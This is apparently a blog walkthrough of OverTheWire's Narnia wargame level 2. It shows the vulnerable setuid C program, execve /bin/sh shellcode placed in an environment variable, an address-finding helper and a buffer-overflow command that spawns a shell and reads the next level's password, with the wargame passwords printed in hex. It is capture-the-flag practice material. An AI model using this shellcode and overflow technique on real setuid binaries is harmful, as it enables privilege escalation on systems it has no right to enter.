# Narnia wargame: Level 2 


# ssh narnia2@narnia.labs.overthewire.org
narnia2@narnia.labs.overthewire.org's password:6e616972696570656375

narnia2@melissa$ file /narnia/narnia2
/narnia/narnia2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia2@melissa$ cat /narnia/narnia2.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char * argv[]){
        char buf[128];

        if(argc == 1){
                printf("Usage: %s argument\n", argv[0]);
                exit(1);
        }
        strcpy(buf,argv[1]);
        printf("%s", buf);

        return 0;
}
narnia2@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
narnia2@melissa$ cat getenvaddr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[]){
        char *ptr;
        ptr=getenv(argv[1]);
        ptr+=(strlen(argv[0])-strlen(argv[2]))*2;
        printf("%s will be at %p\n",argv[1],ptr);
        return 0;
}
narnia2@melissa$ gcc -m32 -o getenvaddr getenvaddr.c
narnia2@melissa$ ./getenvaddr EGG /narnia/narnia2
EGG will be at 0xffffd97d
narnia2@melissa$ /narnia/narnia2 `perl -e 'print "\x90"x140 . "\x7d\xd9\xff\xff"'`
$ /usr/bin/whoami
narnia3
$ /bin/cat /etc/narnia_pass/narnia3
766165717565657a6565
Posted by t0n1
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)